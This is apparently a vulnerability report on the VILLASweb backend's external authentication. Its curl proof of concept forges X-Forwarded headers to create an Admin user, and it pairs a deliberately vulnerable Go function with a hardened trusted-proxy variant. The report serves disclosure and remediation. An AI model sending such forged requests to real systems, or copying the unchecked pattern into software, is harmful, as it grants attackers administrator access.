Description
Checking the code for external auth, it is clear that user creation is based only on some "X-Forwarded-..." headers.
By setting the environment variable AUTH_EXTERNAL_ENABLED=true and sending a request with all the necessary headers, it is possible to make the backend create an admin user from scratch, without any external login URL check:
curl -X POST http://localhost:4000/api/v2/authenticate/external \
-H 'X-Forwarded-User:someuser' -H 'X-Forwarded-Email:dummy@dum.dm' \
-H 'X-Forwarded-Groups:admin'
One then gets the response:
{"message":"Authenticated","success":true,"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Miwicm9sZSI6IkFkbWluIiwiZXhwIjoxNzU3NDk3MDUyLCJpYXQiOjE3NTY4OTIyNTIsImlzcyI6Imh0dHA6Ly93ZWIudmlsbGFzLmZlaW4tYWFjaGVuLm9yZy8ifQ.NXnuQ1Y9t222pUbWL3F4wBlMdKo5xjagaQpVBihY5V8","user":{"id":2,"createdAt":"2025-09-03T09:37:32.917927467Z","updatedAt":"2025-09-03T09:37:32.917927467Z","username":"someuser","mail":"dummy@dum.dm","role":"Admin","active":true}}
I am guessing the most (golang) idiomatic way to implement this, for a modular Identity Provider, is to have a params/body/header mapper that takes forwarded data, maps it to a proper payload (according to whichever external auth service is configured), and attempts to log in using the payload.
If the login works, the user gets a redirect to a context where they get a token of some sort (or an account).
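As an added example (not code from this issue or from the VILLASweb backend), here is the pattern the report describes next to a hardened variant, in Go since the backend is Go. The unchecked function turns three client-supplied headers straight into a user with a role; the hardened one honours X-Forwarded-* only when the TCP peer of the connection is one of the configured reverse proxies. The config struct, the CIDR allow-list, the error values, the "admin" group name and the peer addresses are assumptions made for illustration; the request itself is rebuilt from the curl command above as a constructed sample.

```go
package main

import (
	"errors"
	"net"
	"net/http"
	"net/http/httptest"
	"strings"
)

// ExternalAuthConfig is a hypothetical config (not VILLASweb's own struct): the
// AUTH_EXTERNAL_ENABLED switch from the report plus the check the report says is
// missing, the CIDRs of the reverse proxies allowed to assert identities.
type ExternalAuthConfig struct {
	Enabled        bool
	TrustedProxies []string
}

type ExternalUser struct{ Username, Mail, Role string }

var (
	ErrDisabled       = errors.New("external authentication is disabled")
	ErrUntrustedPeer  = errors.New("X-Forwarded-* headers from an untrusted peer")
	ErrMissingHeaders = errors.New("X-Forwarded-User and X-Forwarded-Email are required")
)

// PeerIsTrusted checks the TCP peer of the request (r.RemoteAddr), which the client
// cannot forge, against the allow-list. X-Forwarded-For is deliberately not used
// here: it is itself a client-supplied header.
func PeerIsTrusted(remoteAddr string, trustedCIDRs []string) bool {
	host, _, err := net.SplitHostPort(remoteAddr)
	if err != nil {
		host = remoteAddr
	}
	ip := net.ParseIP(host)
	if ip == nil {
		return false
	}
	for _, c := range trustedCIDRs {
		if _, n, err := net.ParseCIDR(c); err == nil && n.Contains(ip) {
			return true
		}
	}
	return false
}

// RoleFromGroups maps the comma-separated X-Forwarded-Groups value to a role, as
// the response in the report suggests: membership in "admin" yields "Admin".
func RoleFromGroups(groups string) string {
	for _, g := range strings.Split(groups, ",") {
		if strings.EqualFold(strings.TrimSpace(g), "admin") {
			return "Admin"
		}
	}
	return "User"
}

func userFromHeaders(h http.Header) (ExternalUser, error) {
	user, mail := h.Get("X-Forwarded-User"), h.Get("X-Forwarded-Email")
	if user == "" || mail == "" {
		return ExternalUser{}, ErrMissingHeaders
	}
	return ExternalUser{Username: user, Mail: mail, Role: RoleFromGroups(h.Get("X-Forwarded-Groups"))}, nil
}

// UserFromForwardedHeadersUnchecked reproduces the flaw in the report: anyone who
// can reach the backend and set three headers becomes whoever they claim to be.
func UserFromForwardedHeadersUnchecked(r *http.Request, cfg ExternalAuthConfig) (ExternalUser, error) {
	if !cfg.Enabled {
		return ExternalUser{}, ErrDisabled
	}
	return userFromHeaders(r.Header)
}

// UserFromForwardedHeaders is the hardened form: the headers are honoured only
// when the connection itself comes from a configured reverse proxy.
func UserFromForwardedHeaders(r *http.Request, cfg ExternalAuthConfig) (ExternalUser, error) {
	if !cfg.Enabled {
		return ExternalUser{}, ErrDisabled
	}
	if !PeerIsTrusted(r.RemoteAddr, cfg.TrustedProxies) {
		return ExternalUser{}, ErrUntrustedPeer
	}
	return userFromHeaders(r.Header)
}

// ForgedRequest rebuilds the curl request from the report as a constructed sample,
// arriving at the backend from the given (assumed) peer address.
func ForgedRequest(peer string) *http.Request {
	r := httptest.NewRequest(http.MethodPost, "/api/v2/authenticate/external", nil)
	r.RemoteAddr = peer
	r.Header.Set("X-Forwarded-User", "someuser")
	r.Header.Set("X-Forwarded-Email", "dummy@dum.dm")
	r.Header.Set("X-Forwarded-Groups", "admin")
	return r
}
```

With a proxy allow-list of 10.0.0.0/8, the forged request from 203.0.113.7 still yields an Admin user through UserFromForwardedHeadersUnchecked but fails with ErrUntrustedPeer through UserFromForwardedHeaders, while the same headers arriving from 10.0.0.5 are accepted. The peer check is necessary but not sufficient: the reverse proxy must also overwrite, not merely pass through, any X-Forwarded-* headers the client sends, and the backend should not be reachable on a network path that bypasses the proxy. A shared secret header set only by the proxy is an alternative to the CIDR check when peer addresses are not stable.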